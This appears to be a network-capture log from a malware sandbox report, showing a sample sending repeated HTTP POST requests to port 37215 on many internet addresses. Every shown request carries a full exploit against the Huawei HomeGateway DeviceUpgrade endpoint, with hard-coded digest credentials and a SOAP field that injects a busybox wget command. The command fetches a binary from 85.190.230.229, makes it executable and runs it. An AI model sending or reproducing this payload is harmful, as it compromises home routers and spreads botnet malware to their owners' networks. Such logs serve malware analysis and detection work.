                                                                      Aug 2, 2024 13:17:06.738962889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      120192.168.2.1449874197.160.243.2137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.818423986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.785970926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      121192.168.2.144554041.73.227.11537215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.872625113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.689964056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.649979115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.537885904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.473776102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      122192.168.2.1459468102.211.42.24337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.053209066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      123192.168.2.1458914197.232.105.5837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.054637909 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      124192.168.2.1439162197.51.193.637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.055627108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 